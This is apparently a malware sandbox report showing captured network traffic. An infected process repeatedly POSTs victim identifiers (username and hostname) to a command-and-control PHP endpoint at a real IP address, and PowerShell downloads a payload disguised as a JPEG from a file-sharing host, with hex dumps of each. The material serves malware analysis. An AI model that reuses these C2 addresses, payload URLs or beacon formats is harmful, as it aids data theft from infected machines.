                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:45.715318918 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:45 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                68192.168.2.45001094.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:45.879076004 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:45.883898973 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:47.222376108 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:47 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                69192.168.2.45001694.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:47.362961054 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:47.367954969 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:48.319152117 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:48 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                70192.168.2.45002194.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:48.518177032 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:48.523171902 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:49.483989954 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:49 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                71192.168.2.45002694.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:49.626610041 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:49.631500006 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:51.299175024 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:50 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.
                                                                                                                Nov 15, 2024 18:15:51.301553011 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:50 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                72192.168.2.45003094.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:51.439925909 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:51.452173948 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:52.389782906 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:52 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                73192.168.2.45003994.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:52.545501947 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:52.550654888 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:53.531023026 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:53 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                74192.168.2.45004494.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:53.674910069 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:53.681411028 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:54.620743990 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:54 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                75192.168.2.45004994.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:54.773739100 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:54.778594017 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:55.777123928 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:55 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                76192.168.2.45005494.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:55.936876059 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:55.941776991 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:56.869158030 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:56 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                77192.168.2.45006394.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:57.029602051 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:57.034588099 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:58.000564098 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:57 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                78192.168.2.45006894.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:58.143311024 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:58.148279905 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:15:59.147363901 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:15:59 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                79192.168.2.45007394.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:15:59.317055941 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:15:59.321995974 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:16:00.269982100 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:16:00 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                80192.168.2.45008094.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:16:00.427676916 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:16:00.432593107 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:16:01.382997036 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:16:01 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                81192.168.2.45008494.156.177.95802736C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:16:01.544954062 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                                                                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                Host: 94.156.177.95
                                                                                                                Accept: */*
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Encoding: binary
                                                                                                                Content-Key: B29C1220
                                                                                                                Content-Length: 149
                                                                                                                Connection: close
                                                                                                                Nov 15, 2024 18:16:01.549900055 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 38 00 38 00 38 00 36 00 38 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                Data Ascii: (ckav.rujones888683JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                Nov 15, 2024 18:16:02.497056961 CET236INHTTP/1.1 404 Not Found
                                                                                                                Server: nginx/1.26.1
                                                                                                                Date: Fri, 15 Nov 2024 17:16:02 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Length: 23
                                                                                                                Connection: close
                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                Status: 404 Not Found
                                                                                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                Data Ascii: File not found.


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.449731142.215.209.784435820C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-11-15 17:14:12 UTC192OUTGET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1
                                                                                                                Host: 1017.filemail.com
                                                                                                                Connection: Keep-Alive
                                                                                                                2024-11-15 17:14:12 UTC324INHTTP/1.1 200 OK
                                                                                                                Content-Length: 2230233
                                                                                                                Content-Type: image/jpeg
                                                                                                                Last-Modified: Thu, 07 Nov 2024 02:06:04 GMT
                                                                                                                Accept-Ranges: bytes
                                                                                                                ETag: 4bb5a8185f3b16880e3dcc573015c5d9
                                                                                                                X-Transfer-ID: wxhdiueivoluihj
                                                                                                                Content-Disposition: attachment; filename=new_imagem.jpg
                                                                                                                Date: Fri, 15 Nov 2024 17:14:11 GMT
                                                                                                                Connection: close
                                                                                                                2024-11-15 17:14:12 UTC2001INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                                                Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                                                2024-11-15 17:14:12 UTC8192INData Raw: eb 41 b6 9e d8 27 92 44 d2 46 c6 49 4d ba 83 4e 18 91 b4 d8 15 d3 00 1d a1 84 84 74 56 6e 4b 05 17 ce 19 e7 48 f4 c5 56 48 d9 87 25 56 1e 41 ae 79 bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06
                                                                                                                Data Ascii: A'DFIMNtVnKHVH%VAy2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h|e)2)[udwR<e:29+,AOQlAy
